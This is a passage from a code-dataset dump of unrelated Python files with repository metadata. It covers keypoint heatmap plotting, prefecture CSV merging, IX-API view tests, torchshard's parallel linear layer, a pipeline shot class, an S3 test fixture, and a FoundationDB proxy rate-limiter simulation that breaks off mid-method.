# normalise to center of actual keypoint
x_norm = [x + X[n] for x in x_hist]
y_norm = [y + Y[n] for y in y_hist]
# for bins, only consider spread within range (-10, 10) from center
bin_x_range = np.arange(X[n] - pix_width, X[n] + pix_width, 1.0)
bin_y_range = np.arange(Y[n] - pix_width, Y[n] + pix_width, 1.0)
colour = hex_to_unit_rgb(colours[dog_dataset["keypoint_list"][n]][1:]) # get colour in (r,g,b) format
colour_ramp = [[*colour, i] for i in np.arange(0, 1, 0.01)] # from full alpha to full colour
cmap = colors.LinearSegmentedColormap.from_list('my_colormap', colour_ramp)
h, *_ = np.histogram2d(x_norm, y_norm)
vmax = sorted(h.flatten())[-5] # will be distorted by maximum 4 verts, so look below that
ax.hist2d(x_norm, y_norm, bins=[bin_x_range, bin_y_range], cmap=cmap, vmax=vmax)
ax.set_xlim(0, W)
ax.set_ylim(0, H)
ax.invert_yaxis()
ax.axis("off")
plt.subplots_adjust(left=0, bottom=0, right=1, top=1)
plt.savefig(
r"C:\Users\Ollie\Dropbox\Ollie\University\IIB\Project\Figures\image_processing\dataset_statistics\heatmap.png",
dpi=dpi)
if __name__ == "__main__":
extract_segmentations(**dog_dataset)
# get_variation_by_keypoint(**dog_dataset)
# plot_keypoint_heatmaps()
| 34.927007 | 126 | 0.676419 | 2,354 | 14,355 | 3.935854 | 0.171198 | 0.027307 | 0.007771 | 0.010362 | 0.387588 | 0.351754 | 0.328009 | 0.307285 | 0.285699 | 0.285699 | 0 | 0.016043 | 0.192337 | 14,355 | 410 | 127 | 35.012195 | 0.783077 | 0.228352 | 0 | 0.256098 | 0 | 0.012195 | 0.142792 | 0.040004 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028455 | false | 0 | 0.01626 | 0.004065 | 0.060976 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
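# Illustrative: inspect one of the saved segmentation arrays (hypothetical
# path; class ids follow the comment in extract_segmentations).
import numpy as np
seg = np.load('/path/to/ear_tail_segments/segs/some_dog.npy')
labels = {0: 'background', 1: 'body', 2: 'left ear', 3: 'right ear', 4: 'tail'}
for value, count in zip(*np.unique(seg, return_counts=True)):
    print(labels.get(int(value), '?'), count)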
9c9ab6d958bddc118fb34cac20ce0e74d1c7b8ce | 664 | py | Python | dl_jp_geojson/data/makecsv.py | mski-iksm/dl_jp_geojson | 64edaa3f6200994c4d8fb61b52ecc0bae9da6842 | [
"MIT"
] | null | null | null | dl_jp_geojson/data/makecsv.py | mski-iksm/dl_jp_geojson | 64edaa3f6200994c4d8fb61b52ecc0bae9da6842 | [
"MIT"
] | null | null | null | dl_jp_geojson/data/makecsv.py | mski-iksm/dl_jp_geojson | 64edaa3f6200994c4d8fb61b52ecc0bae9da6842 | [
"MIT"
] | null | null | null | import pandas as pd
savename = "prefecture_city.csv"
savedf = None
for num in range(1, 48):
strnum = '{0:02d}'.format(num)
filename = "prefecture{}.txt".format(strnum)
df = pd.read_csv(filename, sep='|', skiprows=[1])
df.columns = ["nan0", 'prefecture_name', 'prefecture_code',
'city_name', 'city_code', 'gj', 'tj', 'nan7']
df = df.astype(str)
for col in df.columns[1:-1]:
df[col] = df[col].str.strip()
df = df.iloc[:, 1:5]
    if savedf is None:
savedf = df
else:
savedf = pd.concat([savedf, df])
savedf = savedf.reset_index(drop=True)
savedf.to_csv(savename)
| 27.666667 | 64 | 0.575301 | 92 | 664 | 4.065217 | 0.521739 | 0.016043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026369 | 0.25753 | 664 | 23 | 65 | 28.869565 | 0.732252 | 0 | 0 | 0 | 0 | 0 | 0.160686 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.052632 | 0 | 0.052632 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
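# Illustrative round-trip check of the merged CSV produced above.
import pandas as pd
merged = pd.read_csv("prefecture_city.csv", index_col=0)
print(merged.columns.tolist())  # ['prefecture_name', 'prefecture_code', 'city_name', 'city_code']
print(len(merged), "rows")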
9c9b7594766494a397545f4d3091de4ab4059dcb | 2,396 | py | Python | extras/tests/test_views.py | 2bithacker/peering-manager | 5953c4b1f2cff2a370b68d418a98c5c9e3037de8 | [
"Apache-2.0"
] | null | null | null | extras/tests/test_views.py | 2bithacker/peering-manager | 5953c4b1f2cff2a370b68d418a98c5c9e3037de8 | [
"Apache-2.0"
] | 1 | 2021-11-11T22:08:22.000Z | 2021-11-11T22:08:22.000Z | extras/tests/test_views.py | 2bithacker/peering-manager | 5953c4b1f2cff2a370b68d418a98c5c9e3037de8 | [
"Apache-2.0"
] | null | null | null | from unittest.mock import patch
from funcy.funcs import identity
from extras.models import IXAPI
from utils.testing import ViewTestCases
class IXAPITestCase(ViewTestCases.PrimaryObjectViewTestCase):
model = IXAPI
test_bulk_edit_objects = None
@classmethod
def setUpTestData(cls):
IXAPI.objects.bulk_create(
[
IXAPI(
name="IXP 1",
url="https://ixp1-ixapi.example.net/v1/",
api_key="key-ixp1",
api_secret="secret-ixp1",
identity="1234",
),
IXAPI(
name="IXP 2",
url="https://ixp2-ixapi.example.net/v2/",
api_key="key-ixp2",
api_secret="secret-ixp2",
identity="1234",
),
IXAPI(
name="IXP 3",
url="https://ixp3-ixapi.example.net/v3/",
api_key="key-ixp3",
api_secret="secret-ixp3",
identity="1234",
),
]
)
cls.form_data = {
"name": "IXP 4",
"url": "https://ixp4-ixapi.example.net/v1/",
"api_key": "key-ixp4",
"api_secret": "secret-ixp4",
"identity": "1234",
}
def test_get_object_anonymous(self):
with patch(
"extras.models.ix_api.IXAPI.get_customers",
return_value=[
{"id": "1234", "name": "Customer 1"},
{"id": "5678", "name": "Customer 2"},
],
):
super().test_get_object_anonymous()
def test_get_object_with_permission(self):
with patch(
"extras.models.ix_api.IXAPI.get_customers",
return_value=[
{"id": "1234", "name": "Customer 1"},
{"id": "5678", "name": "Customer 2"},
],
):
super().test_get_object_with_permission()
def test_edit_object_with_permission(self):
with patch(
"extras.models.ix_api.IXAPI.get_customers",
return_value=[
{"id": "1234", "name": "Customer 1"},
{"id": "5678", "name": "Customer 2"},
],
):
super().test_edit_object_with_permission()
| 30.329114 | 61 | 0.466611 | 225 | 2,396 | 4.773333 | 0.288889 | 0.067039 | 0.055866 | 0.053073 | 0.489758 | 0.395717 | 0.395717 | 0.3473 | 0.3473 | 0.3473 | 0 | 0.046122 | 0.402755 | 2,396 | 78 | 62 | 30.717949 | 0.704403 | 0 | 0 | 0.441176 | 0 | 0 | 0.217028 | 0.050083 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.058824 | 0 | 0.161765 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
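# Illustrative: the patching pattern the tests above rely on, in isolation,
# so no live IX-API endpoint is ever contacted.
from unittest.mock import patch

with patch("extras.models.ix_api.IXAPI.get_customers",
           return_value=[{"id": "1234", "name": "Customer 1"}]):
    pass  # any view exercised here sees the stubbed customer list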
9c9bed51d7ce9e6e6a8e36ed3a6d340243c9131e | 7,399 | py | Python | torchshard/nn/modules/linear.py | KaiyuYue/torchshard | 89e21def180bf6063ceb2e312a61631173abc7e7 | [
"Apache-2.0"
] | 265 | 2021-04-27T12:06:45.000Z | 2022-03-17T11:13:17.000Z | torchshard/nn/modules/linear.py | poodarchu/torchshard | 667cfce9ed3e2170c7768d910a71aa07897857e7 | [
"Apache-2.0"
] | 7 | 2021-05-24T06:54:44.000Z | 2022-01-01T18:47:38.000Z | torchshard/nn/modules/linear.py | KaiyuYue/torchshard | 89e21def180bf6063ceb2e312a61631173abc7e7 | [
"Apache-2.0"
] | 11 | 2021-04-28T04:15:44.000Z | 2022-01-26T04:29:30.000Z | import warnings
import math
from typing import Optional, TypeVar
import torch
import torch.nn as nn
from torch import Tensor
from torch.nn import Module
from torch.nn import init
from torch.nn.parameter import Parameter
import torchshard
from .. import functional as F
from ...distributed import get_world_size, get_group, get_rank
from ...distributed import scatter, gather
from ...__init__ import set_attribute, _PARALLEL_DIM
from ...__init__ import TORCH_VERSION
# See https://mypy.readthedocs.io/en/latest/generics.html#generic-methods-and-generic-self for the use
# of `T` to annotate `self`. Many methods of `Module` return `self` and we want those return values to be
# the type of the subclass, not the looser type of `Module`.
T = TypeVar('T', bound='Module')
class RegisterParallelDim(Module):
"""
Helper class to register parallel dimension attribute to tensors.
Args:
dim (int): which dimension along to parallelize the tensor.
Returns:
x (Tensor): same as input tensor.
"""
__constants__ = ['dim']
dim: Optional[int]
def __init__(self, dim: Optional[int] = None) -> None:
super(RegisterParallelDim, self).__init__()
self.dim = dim
def __setstate__(self, state):
self.__dict__.update(state)
if not hasattr(self, 'dim'):
self.dim = None
def forward(self, x):
if isinstance(x, list) or isinstance(x, tuple):
for _x in x:
set_attribute(_x, self.dim)
elif isinstance(x, Tensor):
set_attribute(x, self.dim)
else:
            raise ValueError(f'unsupported input type: {type(x)}')
return x
def extra_repr(self):
return 'dim={}'.format(self.dim)
class ParallelLinear(Module):
"""
Parallel version of :class::`torch.nn.Linear`.
Arguments are similar to :class:`torch.nn.Linear`. Extra arguments:
Args:
dim (int): which dimension along to parallelize layers.
Returns:
:class::`torch.Tensor`.
"""
__constants__ = ['in_features', 'out_features', 'dim']
in_features: int
out_features: int
weight: Tensor
dim: Optional[int]
def __init__(self, in_features: int, out_features: int, bias: bool = True, dim: Optional[int] = None) -> None:
super(ParallelLinear, self).__init__()
self.in_features = in_features
self.out_features = out_features
self.dim = dim
self.weight = torch.empty((self.out_features, self.in_features))
if bias:
self.bias = torch.empty((self.out_features))
else:
self.bias = self.register_parameter('bias', None)
self.reset_params()
self.slice_params()
def __setstate__(self, state):
self.__dict__.update(state)
if not hasattr(self, 'dim'):
self.dim = None
def reset_params(self) -> None:
init.kaiming_uniform_(self.weight, a=math.sqrt(5))
if self.bias is not None:
fan_in, _ = init._calculate_fan_in_and_fan_out(self.weight)
bound = 1 / math.sqrt(fan_in)
init.uniform_(self.bias, -bound, bound)
def slice_params(self) -> None:
# scatter weight and bias
if self.dim == -1 or self.dim == 1:
self.weight = scatter(self.weight, dim=0)
if self.bias is not None:
self.bias = scatter(self.bias, dim=0)
if self.dim == 0:
self.weight = scatter(self.weight, dim=1)
# wrap into Parameter
self.weight = Parameter(self.weight)
if self.bias is not None:
self.bias = Parameter(self.bias)
# set parallel attr
self._set_parameter_attr([self.weight, self.bias], self.dim)
def forward(self, input: Tensor) -> Tensor:
return F.parallel_linear(input, self.weight, self.bias, self.dim)
def extra_repr(self):
return 'in_features={}, out_features={}, bias={}, dim={}'.format(
self.in_features, self.out_features, self.bias is not None, self.dim
)
@classmethod
def _set_parameter_attr(cls, tensors, dim=None):
if not isinstance(tensors, list):
tensors = [tensors]
for t in tensors:
if t is None:
continue
set_attribute(t, dim)
if isinstance(t, torch.nn.Parameter):
# NOTE: Both setattr and __setattr__ doesn't work.
set_attribute(t.data, dim)
@classmethod
def convert_parallel_linear(cls, module, dim=None):
"""
Helper function to convert all :class::`torch.nn.Linear` layers in the model to
:class::`torch.nn.ParallelLinear` layers.
"""
if not dim in [None, 1, -1, 0]:
raise ValueError(f"")
module_output = module
_ddp_params_and_buffers_to_ignore = []
if isinstance(module, torch.nn.Linear):
module_output = torchshard.nn.ParallelLinear(
module.in_features,
module.out_features,
bias=(module.bias is not None),
dim=dim
)
with torch.no_grad():
if dim is None:
module_output.weight = module.weight
if module.bias is not None:
module_output.bias = module.bias
else:
if dim == -1 or dim == 1:
module_output.weight = Parameter(scatter(module.weight, dim=0))
if module.bias is not None:
module_output.bias = Parameter(scatter(module.bias, dim=0))
else:
module_output.weight = Parameter(scatter(module.weight, dim=1))
if module.bias is not None:
module_output.bias = module.bias
# Above assignments will brush off the _PARALLEL_DIM. So we set it again.
cls._set_parameter_attr(
[module_output.weight, module_output.bias], dim)
if hasattr(module, "qconfig"):
module_output.qconfig = module.qconfig
for name, child in module.named_children():
module_output.add_module(name, cls.convert_parallel_linear(child, dim))
# make DDP ignore parallel linear's weight and bias parameters
module_output_child = getattr(module_output, name)
if isinstance(module_output_child, torchshard.nn.ParallelLinear):
if hasattr(module_output_child.weight, _PARALLEL_DIM):
parallel_dim = getattr(module_output_child.weight, _PARALLEL_DIM)
if parallel_dim is not None:
_ignore_name = f'{name}.weight'
_ddp_params_and_buffers_to_ignore.append(_ignore_name)
if hasattr(module_output_child.bias, _PARALLEL_DIM):
parallel_dim = getattr(module_output_child.bias, _PARALLEL_DIM)
if parallel_dim is not None:
_ignore_name = f'{name}.bias'
_ddp_params_and_buffers_to_ignore.append(_ignore_name)
del module
# register for ignoring parallel linear in DDP
setattr(module_output, '_ddp_params_and_buffers_to_ignore', _ddp_params_and_buffers_to_ignore)
return module_output
| 35.066351 | 114 | 0.602784 | 903 | 7,399 | 4.717608 | 0.188261 | 0.059155 | 0.021127 | 0.024413 | 0.340845 | 0.289671 | 0.197418 | 0.184272 | 0.107277 | 0.078404 | 0 | 0.003109 | 0.304501 | 7,399 | 210 | 115 | 35.233333 | 0.824718 | 0.145831 | 0 | 0.228571 | 0 | 0 | 0.026401 | 0.005312 | 0 | 0 | 0 | 0 | 0 | 1 | 0.085714 | false | 0 | 0.107143 | 0.021429 | 0.292857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
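# Illustrative conversion sketch (assumes torch.distributed and the
# torchshard process groups are already initialized).
import torch
import torchshard

model = torch.nn.Sequential(
    torch.nn.Linear(256, 512),
    torch.nn.ReLU(),
    torch.nn.Linear(512, 10),
)
model = torchshard.nn.ParallelLinear.convert_parallel_linear(model, dim=1)
print(model)  # both Linear layers become ParallelLinear with dim=1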
9c9e5420532409a23c5fc534b2790fbcc02c3ff3 | 3,104 | py | Python | solstice/core/shot.py | tpoveda/solstice | ccccc376cebd6701d038fdd6ebaabc33ebdf259f | [
"MIT"
] | null | null | null | solstice/core/shot.py | tpoveda/solstice | ccccc376cebd6701d038fdd6ebaabc33ebdf259f | [
"MIT"
] | null | null | null | solstice/core/shot.py | tpoveda/solstice | ccccc376cebd6701d038fdd6ebaabc33ebdf259f | [
"MIT"
] | null | null | null | #! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
Base class that defines Artella Shot for Solstice
"""
from __future__ import print_function, division, absolute_import
__author__ = "Tomas Poveda"
__license__ = "MIT"
__maintainer__ = "Tomas Poveda"
__email__ = "tpovedatd@gmail.com"
import logging
import artellapipe.register
from artellapipe.core import shot
from artellapipe.libs.kitsu.core import kitsulib
from artellapipe.libs.naming.core import naminglib
LOGGER = logging.getLogger()
class SolsticeShot(shot.ArtellaShot, object):
def __init__(self, project, shot_data):
self._name_dict = dict()
super(SolsticeShot, self).__init__(project=project, shot_data=shot_data)
def get_path(self):
"""
Implements base shot.ArtellaShot get_path function
:return: str
"""
shot_file_class = artellapipe.FilesMgr().get_file_class('rough')
if not shot_file_class:
LOGGER.warning('Impossible to retrieve Shot File for "{}"'.format(self.get_name()))
return None
file_type = self.get_file_type('rough')
print(file_type)
def get_number(self):
"""
Override base shot.ArtellaShot get_sequence function
Returns the number of the shot
:return: str
"""
shot_rule_name = artellapipe.ShotsMgr().config.get('data', 'shot_rule')
rule = naminglib.ArtellaNameLib().get_rule(shot_rule_name)
if not rule:
            LOGGER.warning('No Rule found with name: "{}"'.format(shot_rule_name))
            return None
current_rule = None
try:
current_rule = naminglib.ArtellaNameLib().active_rule()
naminglib.ArtellaNameLib().set_active_rule(shot_rule_name)
parsed_rule = naminglib.ArtellaNameLib().parse(self.get_name())
finally:
if current_rule:
naminglib.ArtellaNameLib().set_active_rule(current_rule)
if not parsed_rule:
LOGGER.warning('Impossible to retrieve rule number from shot name: {}'.format(self.get_name()))
return None
return parsed_rule.get('shot_number', None)
def get_sequence(self):
"""
Override base shot.ArtellaShot get_sequence function
Returns the name of the sequence this shot belongs to
:return: str
"""
sequence_attr = artellapipe.ShotsMgr().config.get('data', 'sequence_attribute')
sequence_id = self._shot_data.get(sequence_attr, None)
if not sequence_id:
LOGGER.warning(
'Impossible to retrieve sequence name because shot data does not contains "{}" attribute.'
'\nSequence Data: {}'.format(sequence_attr, self._shot_data))
return None
if self._name_dict and sequence_id in self._name_dict:
return self._name_dict[sequence_id]
sequence_name = kitsulib.get_shot_sequence({'parent_id': sequence_id}).name
self._name_dict = {sequence_id: sequence_name}
return sequence_name
artellapipe.register.register_class('Shot', SolsticeShot)
| 31.353535 | 107 | 0.662371 | 366 | 3,104 | 5.327869 | 0.281421 | 0.024615 | 0.030769 | 0.033846 | 0.248718 | 0.165128 | 0.09641 | 0.061538 | 0.061538 | 0.061538 | 0 | 0.000425 | 0.241946 | 3,104 | 98 | 108 | 31.673469 | 0.828304 | 0.12049 | 0 | 0.056604 | 0 | 0 | 0.132083 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075472 | false | 0 | 0.113208 | 0 | 0.320755 | 0.037736 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9c9e6fd73ba9c604609823280549a5b9ea38d594 | 764 | py | Python | tests/integration/conftest.py | pshelby/boto3_paginator | 9680e6f2f4075e1c3bb7a082f913a514e0d912f5 | [
"MIT"
] | null | null | null | tests/integration/conftest.py | pshelby/boto3_paginator | 9680e6f2f4075e1c3bb7a082f913a514e0d912f5 | [
"MIT"
] | null | null | null | tests/integration/conftest.py | pshelby/boto3_paginator | 9680e6f2f4075e1c3bb7a082f913a514e0d912f5 | [
"MIT"
] | null | null | null | """Fixtures for integration tests."""
from pytest import fixture
@fixture(scope="module")
def test_bucket():
"""Create an S3 bucket for integration tests."""
import boto3
bucket_name = 'boto3-paginator-integration-test'
s3_client = boto3.client('s3')
_ = s3_client.create_bucket(Bucket=bucket_name)
s3_client.put_bucket_versioning(
Bucket=bucket_name,
VersioningConfiguration={'MFADelete': 'Disabled',
'Status': 'Enabled'})
print('S3 bucket "%s" created' % bucket_name)
yield bucket_name
s3_resource = boto3.resource('s3')
bucket = s3_resource.Bucket(bucket_name)
bucket.objects.all().delete()
bucket.delete()
print('S3 bucket "%s" deleted' % bucket_name)
| 27.285714 | 57 | 0.659686 | 88 | 764 | 5.534091 | 0.409091 | 0.143737 | 0.098563 | 0.057495 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023372 | 0.215969 | 764 | 27 | 58 | 28.296296 | 0.789649 | 0.096859 | 0 | 0 | 0 | 0 | 0.170839 | 0.047128 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.111111 | 0 | 0.166667 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
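# Illustrative test consuming the fixture above (runs against real S3,
# so AWS credentials must be configured).
def test_bucket_starts_empty(test_bucket):
    import boto3
    s3 = boto3.client('s3')
    response = s3.list_objects_v2(Bucket=test_bucket)
    assert response['KeyCount'] == 0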
9ca2a39bfe7f388015f1c315841d7c7f13c699eb | 14,764 | py | Python | contrib/grv_proxy_model/proxy_model.py | PierreZ/foundationdb | d97d9681766766836f991ec65f64b66b654b966c | [
"Apache-2.0"
] | 11,024 | 2018-04-19T16:06:46.000Z | 2022-03-31T23:43:55.000Z | contrib/grv_proxy_model/proxy_model.py | PierreZ/foundationdb | d97d9681766766836f991ec65f64b66b654b966c | [
"Apache-2.0"
] | 4,430 | 2018-04-19T17:12:33.000Z | 2022-03-31T23:56:34.000Z | contrib/grv_proxy_model/proxy_model.py | PierreZ/foundationdb | d97d9681766766836f991ec65f64b66b654b966c | [
"Apache-2.0"
] | 1,146 | 2018-04-19T16:45:57.000Z | 2022-03-30T10:43:57.000Z | #
# proxy_model.py
#
# This source file is part of the FoundationDB open source project
#
# Copyright 2013-2020 Apple Inc. and the FoundationDB project authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import functools
import heapq
from priority import Priority
from smoother import Smoother
@functools.total_ordering
class Task:
def __init__(self, time, fxn):
self.time = time
self.fxn = fxn
def __lt__(self, other):
return self.time < other.time
class Limiter:
class UpdateRateParams:
def __init__(self, time):
self.time = time
class UpdateLimitParams:
def __init__(self, time, elapsed):
self.time = time
self.elapsed = elapsed
class CanStartParams:
def __init__(self, time, num_started, count):
self.time = time
self.num_started = num_started
self.count = count
class UpdateBudgetParams:
def __init__(self, time, num_started, num_started_at_priority, min_priority, last_batch, queue_empty, elapsed):
self.time = time
self.num_started = num_started
self.num_started_at_priority = num_started_at_priority
self.min_priority = min_priority
self.last_batch = last_batch
self.queue_empty = queue_empty
self.elapsed = elapsed
def __init__(self, priority, ratekeeper_model, proxy_model):
self.priority = priority
self.ratekeeper_model = ratekeeper_model
self.proxy_model = proxy_model
self.limit = 0
self.rate = self.ratekeeper_model.get_limit(0, self.priority)
def update_rate(self, params):
pass
def update_limit(self, params):
pass
def can_start(self, params):
pass
def update_budget(self, params):
pass
class OriginalLimiter(Limiter):
def __init__(self, priority, limit_rate_model, proxy_model):
Limiter.__init__(self, priority, limit_rate_model, proxy_model)
def update_rate(self, params):
self.rate = self.ratekeeper_model.get_limit(params.time, self.priority)
def update_limit(self, params):
self.limit = min(0, self.limit) + params.elapsed * self.rate
self.limit = min(self.limit, self.rate * 0.01)
self.limit = min(self.limit, 100000)
self.proxy_model.results.rate[self.priority][params.time] = self.rate
self.proxy_model.results.limit[self.priority][params.time] = self.limit
def can_start(self, params):
return params.num_started < self.limit
def update_budget(self, params):
self.limit -= params.num_started
class PositiveBudgetLimiter(OriginalLimiter):
def __init__(self, priority, limit_rate_model, proxy_model):
OriginalLimiter.__init__(self, priority, limit_rate_model, proxy_model)
def update_limit(self, params):
self.limit += params.elapsed * self.rate
self.limit = min(self.limit, 2.0 * self.rate)
class ClampedBudgetLimiter(PositiveBudgetLimiter):
def __init__(self, priority, limit_rate_model, proxy_model):
PositiveBudgetLimiter.__init__(self, priority, limit_rate_model, proxy_model)
def update_budget(self, params):
min_budget = -self.rate * 5.0
if self.limit > min_budget:
self.limit = max(self.limit - params.num_started, min_budget)
class TimeLimiter(PositiveBudgetLimiter):
def __init__(self, priority, limit_rate_model, proxy_model):
PositiveBudgetLimiter.__init__(self, priority, limit_rate_model, proxy_model)
self.locked_until = 0
def can_start(self, params):
return params.time >= self.locked_until and PositiveBudgetLimiter.can_start(self, params)
def update_budget(self, params):
#print('Start update budget: time=%f, limit=%f, locked_until=%f, num_started=%d, priority=%s, min_priority=%s, last_batch=%d' % (params.time, self.limit, self.locked_until, params.num_started, self.priority, params.min_priority, params.last_batch))
if params.min_priority >= self.priority or params.num_started < self.limit:
self.limit -= params.num_started
else:
self.limit = min(self.limit, max(self.limit - params.num_started, -params.last_batch))
self.locked_until = min(params.time + 2.0, max(params.time, self.locked_until) + (params.num_started - self.limit)/self.rate)
#print('End update budget: time=%f, limit=%f, locked_until=%f, num_started=%d, priority=%s, min_priority=%s' % (params.time, self.limit, self.locked_until, params.num_started, self.priority, params.min_priority))
class TimePositiveBudgetLimiter(PositiveBudgetLimiter):
def __init__(self, priority, limit_rate_model, proxy_model):
PositiveBudgetLimiter.__init__(self, priority, limit_rate_model, proxy_model)
self.locked_until = 0
def update_limit(self, params):
if params.time >= self.locked_until:
PositiveBudgetLimiter.update_limit(self, params)
def can_start(self, params):
return params.num_started + params.count <= self.limit
def update_budget(self, params):
#if params.num_started > 0:
#print('Start update budget: time=%f, limit=%f, locked_until=%f, num_started=%d, priority=%s, min_priority=%s, last_batch=%d' % (params.time, self.limit, self.locked_until, params.num_started, self.priority, params.min_priority, params.last_batch))
if params.num_started > self.limit:
            self.locked_until = min(params.time + 2.0, max(params.time, self.locked_until) + (params.num_started - self.limit)/self.rate)
self.limit = 0
else:
self.limit -= params.num_started
#if params.num_started > 0:
#print('End update budget: time=%f, limit=%f, locked_until=%f, num_started=%d, priority=%s, min_priority=%s' % (params.time, self.limit, self.locked_until, params.num_started, self.priority, params.min_priority))
class SmoothingLimiter(OriginalLimiter):
def __init__(self, priority, limit_rate_model, proxy_model):
OriginalLimiter.__init__(self, priority, limit_rate_model, proxy_model)
self.smooth_released = Smoother(2)
self.smooth_rate_limit = Smoother(2)
self.rate_set = False
def update_rate(self, params):
OriginalLimiter.update_rate(self, params)
if not self.rate_set:
self.rate_set = True
self.smooth_rate_limit.reset(self.rate)
else:
self.smooth_rate_limit.set_total(params.time, self.rate)
def update_limit(self, params):
self.limit = 2.0 * (self.smooth_rate_limit.smooth_total(params.time) - self.smooth_released.smooth_rate(params.time))
def can_start(self, params):
return params.num_started + params.count <= self.limit
def update_budget(self, params):
self.smooth_released.add_delta(params.time, params.num_started)
class SmoothingBudgetLimiter(SmoothingLimiter):
def __init__(self, priority, limit_rate_model, proxy_model):
SmoothingLimiter.__init__(self, priority, limit_rate_model, proxy_model)
#self.smooth_filled = Smoother(2)
self.budget = 0
def update_limit(self, params):
release_rate = (self.smooth_rate_limit.smooth_total(params.time) - self.smooth_released.smooth_rate(params.time))
#self.smooth_filled.set_total(params.time, 1 if release_rate > 0 else 0)
self.limit = 2.0 * release_rate
self.proxy_model.results.rate[self.priority][params.time] = self.smooth_rate_limit.smooth_total(params.time)
self.proxy_model.results.released[self.priority][params.time] = self.smooth_released.smooth_rate(params.time)
self.proxy_model.results.limit[self.priority][params.time] = self.limit
self.proxy_model.results.limit_and_budget[self.priority][params.time] = self.limit + self.budget
self.proxy_model.results.budget[self.priority][params.time] = self.budget
#self.budget = max(0, self.budget + params.elapsed * self.smooth_rate_limit.smooth_total(params.time))
#if self.smooth_filled.smooth_total(params.time) >= 0.1:
#self.budget += params.elapsed * self.smooth_rate_limit.smooth_total(params.time)
#print('Update limit: time=%f, priority=%s, limit=%f, rate=%f, released=%f, budget=%f' % (params.time, self.priority, self.limit, self.smooth_rate_limit.smooth_total(params.time), self.smooth_released.smooth_rate(params.time), self.budget))
def can_start(self, params):
return params.num_started + params.count <= self.limit + self.budget #or params.num_started + params.count <= self.budget
def update_budget(self, params):
self.budget = max(0, self.budget + (self.limit - params.num_started_at_priority) / 2 * params.elapsed)
if params.queue_empty:
self.budget = min(10, self.budget)
self.smooth_released.add_delta(params.time, params.num_started_at_priority)
class ProxyModel:
class Results:
def __init__(self, priorities, duration):
self.started = self.init_result(priorities, 0, duration)
self.queued = self.init_result(priorities, 0, duration)
self.latencies = self.init_result(priorities, [], duration)
self.unprocessed_queue_sizes = self.init_result(priorities, [], duration)
self.rate = {p:{} for p in priorities}
self.released = {p:{} for p in priorities}
self.limit = {p:{} for p in priorities}
self.limit_and_budget = {p:{} for p in priorities}
self.budget = {p:{} for p in priorities}
def init_result(self, priorities, starting_value, duration):
return {p: {s: copy.copy(starting_value) for s in range(0, duration)} for p in priorities}
def __init__(self, duration, ratekeeper_model, workload_model, Limiter):
self.time = 0
self.log_time = 0
self.duration = duration
self.priority_limiters = { priority: Limiter(priority, ratekeeper_model, self) for priority in workload_model.priorities() }
self.workload_model = workload_model
self.request_scheduled = { p: False for p in self.workload_model.priorities()}
self.tasks = []
self.request_queue = []
self.results = ProxyModel.Results(self.workload_model.priorities(), duration)
def run(self):
self.update_rate()
self.process_requests(self.time)
for priority in self.workload_model.priorities():
next_request = self.workload_model.next_request(self.time, priority)
assert next_request is not None
heapq.heappush(self.tasks, Task(next_request.time, lambda next_request=next_request: self.receive_request(next_request)))
self.request_scheduled[priority] = True
while True: # or len(self.request_queue) > 0:
if int(self.time) > self.log_time:
self.log_time = int(self.time)
#print(self.log_time)
task = heapq.heappop(self.tasks)
self.time = task.time
if self.time >= self.duration:
break
task.fxn()
def update_rate(self):
for limiter in self.priority_limiters.values():
limiter.update_rate(Limiter.UpdateRateParams(self.time))
heapq.heappush(self.tasks, Task(self.time + 0.01, lambda: self.update_rate()))
def receive_request(self, request):
heapq.heappush(self.request_queue, request)
self.results.queued[request.priority][int(self.time)] += request.count
